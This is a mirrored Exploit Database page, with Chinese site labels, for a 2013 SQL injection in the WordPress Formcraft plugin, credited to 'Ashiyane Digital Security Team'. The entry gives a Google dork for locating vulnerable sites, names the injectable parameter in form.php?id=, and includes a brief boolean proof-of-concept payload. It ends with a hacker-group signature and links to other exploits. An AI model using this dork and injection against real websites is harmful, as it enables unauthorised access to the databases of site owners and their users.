WordPress Plugin Formcraft – SQL Injection

Exploit Database
10 阅读

作者： Ashiyane Digital Security Team

日期： 2013-12-02
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/30002/

#######################################################################
# Exploit Title : WordPress formcraft Plugin Sql Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork : inurl:/wp-content/plugins/formcraft
#
# Software Link : www.wordpress.org
#
# Tested on: Windows , Linux
#
# Date: 2013/12/2
#
#############################################
# Exploit : Sql Injection
#
# Location1:
[Target]/wp-content/plugins/formcraft/form.php?id=[Sql]
#
#
#
# Exploit-DB Note:
# A PoC: form.php?id=1%20and%20 1=1
##########################################

##############
Milad Hacking

We Love Mohammad
##############

last Exploits
WordPress Plugin Formcraft – SQL Injection的更多信息

Album Lock 4.0 iOS – Directory Traversal：
Octeth Oempro 3.6.4 – SQL Injection / Information Disclosure：
Groupon Clone Script 3.01 – ‘catid’ SQL Injection：
WebFile Explorer 1.0 – Arbitrary File Download：
spidaNews 1.0 – ‘news.php?id’ SQL Injection：
STVS ProVision 5.9.10 – Cross-Site Request Forgery (Add Admin)：
Pluck CMS 4.7 – Directory Traversal：
Vacation Rental Script – SQL Injection：